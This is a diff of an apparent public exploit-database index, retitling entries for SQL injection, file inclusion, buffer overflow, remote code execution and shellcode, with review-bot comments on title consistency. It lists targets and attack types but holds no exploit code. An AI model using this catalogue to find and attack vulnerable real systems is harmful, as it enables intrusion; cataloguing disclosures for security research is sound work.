41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
|
||||
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
|
||||
41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
|
||||
41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
|
||||
41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
|
||||
41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
|
||||
41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
|
||||
|
@ -15768,7 +15770,7 @@ id,file,description,date,author,platform,type,port
|
|||
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
|
||||
41738,platforms/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
|
||||
41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
|
||||
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
|
||||
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret and Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
|
||||
41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
|
||||
41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0
|
||||
41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0
|
||||
|
@ -15898,6 +15900,7 @@ id,file,description,date,author,platform,type,port
|
|||
42958,platforms/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0
|
||||
42964,platforms/lin_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,lin_x86-64,remote,8080
|
||||
42965,platforms/multiple/remote/42965.rb,"OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,multiple,remote,2480
|
||||
42973,platforms/windows/remote/42973.py,"VX Search Enterprise 10.1.12 - Buffer Overflow",2017-10-09,"Revnic Vasile",windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -17896,7 +17899,7 @@ id,file,description,date,author,platform,type,port
|
|||
3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php id' Parameter SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0
|
||||
3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0
|
||||
3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0
|
||||
3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
|
||||
3089,platforms/asp/webapps/3089.txt,"Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
|
||||
3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0
|
||||
3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0
|
||||
3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Parameter Remote File Inclusion",2007-01-07,beks,php,webapps,0
|
||||
|
@ -18750,7 +18753,7 @@ id,file,description,date,author,platform,type,port
|
|||
4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
|
||||
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
|
||||
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0
|
||||
4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
|
||||
4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
|
||||
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0
|
||||
4524,platforms/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0
|
||||
4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0
|
||||
|
@ -20985,7 +20988,7 @@ id,file,description,date,author,platform,type,port
|
|||
7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
|
||||
7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0
|
||||
7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0
|
||||
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
|
||||
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 / PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
|
||||
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps,0
|
||||
7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
|
||||
7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
|
||||
|
@ -21023,7 +21026,7 @@ id,file,description,date,author,platform,type,port
|
|||
7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - SQL Injection",2008-12-15,ZoRLu,php,webapps,0
|
||||
7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps,0
|
||||
7485,platforms/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
|
||||
7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
|
||||
7486,platforms/asp/webapps/7486.txt,"Click&Rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
|
||||
7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0
|
||||
7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - Database Disclosure",2008-12-16,"Cold Zero",asp,webapps,0
|
||||
7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - 'report.php' SQL Injection",2008-12-16,ka0x,php,webapps,0
|
||||
|
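Review bot: The rename of 7486 to "Click&Rank" leaves neighbouring row 7485 as "clickandemail", all lowercase and spelled with "and", although it shares the author and date and sits beside 7484 "Click&BaneX". If product names are being normalised, 7485 needs the same pass; if the lowercase form is the vendor's own spelling, note that in the commit message so the difference is not mistaken for an oversight.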
@ -22029,7 +22032,7 @@ id,file,description,date,author,platform,type,port
|
|||
9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0
|
||||
9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0
|
||||
9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0
|
||||
9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
|
||||
9110,platforms/php/webapps/9110.txt,"WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
|
||||
9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0
|
||||
9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0
|
||||
9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0
|
||||
|
@ -22648,7 +22651,7 @@ id,file,description,date,author,platform,type,port
|
|||
10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
|
||||
10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10502,platforms/asp/webapps/10502.txt,"Pre Hotels&Resorts Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
|
||||
|
@ -23290,7 +23293,7 @@ id,file,description,date,author,platform,type,port
|
|||
11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0
|
||||
11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,php,webapps,0
|
||||
11625,platforms/php/webapps/11625.txt,"Joomla! Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps,0
|
||||
11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS - (Survey and Poll) SQL Injection",2010-03-04,SENOT,php,webapps,0
|
||||
11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS (Survey and Poll) - SQL Injection",2010-03-04,SENOT,php,webapps,0
|
||||
11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0
|
||||
11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0
|
||||
11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0
|
||||
|
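Review bot: Moving "(Survey and Poll)" in front of the dash fixes 11627, but the rows on either side keep unquoted file names in mixed positions: 11623 "SQL Injection showplugs.php" and 11631 "PHP-Nuke - user.php SQL Injection". Other rows in the file use the form 'report.php' SQL Injection. Suggest bringing 11623 and 11631 into that form in the same change.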
@ -23686,7 +23689,7 @@ id,file,description,date,author,platform,type,port
|
|||
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
|
||||
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
|
||||
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
|
||||
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
|
||||
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)",2010-04-16,EL-KAHINA,php,webapps,0
|
||||
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12269,platforms/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
|
@ -23797,7 +23800,7 @@ id,file,description,date,author,platform,type,port
|
|||
12444,platforms/php/webapps/12444.txt,"PHP Video Battle - SQL Injection",2010-04-28,v3n0m,php,webapps,0
|
||||
12445,platforms/php/webapps/12445.txt,"Articles Directory - Authentication Bypass",2010-04-29,Sid3^effects,php,webapps,0
|
||||
12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
|
||||
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup",2010-04-29,indoushka,php,webapps,0
|
||||
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup",2010-04-29,indoushka,php,webapps,0
|
||||
12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload / Cross-Site Scripting",2010-04-29,Sid3^effects,php,webapps,0
|
||||
12449,platforms/php/webapps/12449.txt,"DZCP (deV!L_z Clanportal) 1.5.3 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
|
||||
12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - Cross-Site Scripting",2010-04-29,"High-Tech Bridge SA",windows,webapps,0
|
||||
|
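Review bot: The typo fix in 12447 ("Creat" to "Create") leaves a title that still does not name the issue: "Pass / Create and Download Backup". "Pass" is ambiguous (password or bypass), and the "and" was not converted to " / " as in other rows of this change. Suggest rewording the description from the exploit file's own summary rather than correcting the spelling alone.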
@ -24280,7 +24283,7 @@ id,file,description,date,author,platform,type,port
|
|||
14035,platforms/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,php,webapps,0
|
||||
14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0
|
||||
14048,platforms/php/webapps/14048.txt,"2DayBiz - Multiple SQL Injections",2010-06-25,Sangteamtham,php,webapps,0
|
||||
14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips Script 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0
|
||||
14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0
|
||||
14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting",2010-06-25,"Zer0 Thunder",php,webapps,0
|
||||
14051,platforms/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,php,webapps,0
|
||||
14053,platforms/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0
|
||||
|
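Review bot: The author field of 14049 reads "G0D-F4Th3rG0D-F4Th3r" on both the old and the new row, which looks like the handle entered twice. Since this row is already being edited to drop "Script" from the title, check the author against the exploit file and correct it in the same change if it is a duplicate.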
@ -26596,7 +26599,7 @@ id,file,description,date,author,platform,type,port
|
|||
21588,platforms/cgi/webapps/21588.txt,"BlackBoard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps,0
|
||||
21590,platforms/php/webapps/21590.txt,"phpAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,php,webapps,0
|
||||
21609,platforms/cgi/webapps/21609.txt,"Fluid Dynamics Search Engine 2.0 - Cross-Site Scripting",2002-07-10,VALDEUX,cgi,webapps,0
|
||||
21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory And File Content Disclosure",2002-07-11,JWC,php,webapps,0
|
||||
21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory and File Content Disclosure",2002-07-11,JWC,php,webapps,0
|
||||
21617,platforms/cgi/webapps/21617.txt,"IMHO Webmail 0.9x - Account Hijacking",2002-07-15,"Security Bugware",cgi,webapps,0
|
||||
21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 - Default Error Page Cross-Site Scripting",2002-07-17,"Peter Gründl",jsp,webapps,0
|
||||
21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,php,webapps,0
|
||||
|
@ -27827,10 +27830,10 @@ id,file,description,date,author,platform,type,port
|
|||
24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - 'wp-login.php' HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0
|
||||
24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0
|
||||
24671,platforms/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple Parameter SQL Injections",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form Password Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - messageDetail.asp MSG_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0
|
||||
24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0
|
||||
24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - SettingsBase.php Cross-Site Scripting",2004-10-14,"Secunia Research",php,webapps,0
|
||||
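Review bot: The new titles for 24672, 24674 and 24675 put the script name and the parameter inside one pair of quotes ('account.asp MM-recordId', 'messages.asp FOR_ID', 'messageDetail.asp MSG_ID') and drop the word "Parameter", so the title no longer says which token is the file and which is the input. Context rows in the same hunk quote only the script, as in 24667 ('wp-login.php') and 24671 ('adDetail.asp'). Quoting the two tokens separately and keeping "Parameter" would match them. Row 24673 sits between the edited rows and is left in the old unquoted style, so the DUforum group ends up in two formats.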
|
@ -32116,7 +32119,7 @@ id,file,description,date,author,platform,type,port
|
|||
30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injections",2007-12-07,Chrysalid,asp,webapps,0
|
||||
30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 - usergallery.php galleryID Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0
|
||||
30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 - calendar.php Multiple Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0
|
||||
30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0
|
||||
30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0
|
||||
30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0
|
||||
30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - mylinks/ratelink.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
|
||||
30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
|
||||
|
@ -32560,7 +32563,7 @@ id,file,description,date,author,platform,type,port
|
|||
31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 - lookup_result.asp domain Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0
|
||||
31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - suggest_result.asp Multiple Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0
|
||||
31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0
|
||||
31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0
|
||||
31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0
|
||||
31555,platforms/php/webapps/31555.txt,"Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusion",2008-03-28,Sibertrwolf,php,webapps,0
|
||||
40770,platforms/php/webapps/40770.txt,"CS-Cart 4.3.10 - XML External Entity Injection",2016-11-16,0x4148,php,webapps,0
|
||||
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
|
||||
|
@ -34025,7 +34028,7 @@ id,file,description,date,author,platform,type,port
|
|||
34110,platforms/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,php,webapps,0
|
||||
34111,platforms/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
|
||||
34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
|
||||
34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
|
||||
34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database and Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
|
||||
34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80
|
||||
34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0
|
||||
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
|
||||
|
@ -34268,7 +34271,7 @@ id,file,description,date,author,platform,type,port
|
|||
34536,platforms/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34538,platforms/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80
|
||||
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80
|
||||
34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0
|
||||
34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,php,webapps,0
|
||||
34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - Parameters.php device Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - idstatusframe.php Multiple Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - survey.php category Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
|
@ -34727,7 +34730,7 @@ id,file,description,date,author,platform,type,port
|
|||
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection",2011-01-16,ShivX,php,webapps,0
|
||||
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
|
||||
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
|
||||
35238,platforms/multiple/webapps/35238.txt,"Gogs - (users and repos q pararm) SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
|
||||
35238,platforms/multiple/webapps/35238.txt,"Gogs - users and repos q SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
|
||||
35239,platforms/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0
|
||||
35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
|
||||
35246,platforms/php/webapps/35246.py,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0
|
||||
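Review bot: The rewritten 35238 title "Gogs - users and repos q SQL Injection" removes the parentheses and the misspelled "pararm" but leaves nothing to mark "q" as the parameter name, so it reads as a stray letter. Quoting it as 'q' and keeping "Parameter", the way 35231 and 35233 in this hunk do, would fix that. The sibling row 35237 directly above still has "Gogs (label pararm) - SQL Injection" with the same typo and the old layout, and should be normalized in the same pass.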
|
@ -35089,7 +35092,7 @@ id,file,description,date,author,platform,type,port
|
|||
35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
|
||||
35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0
|
||||
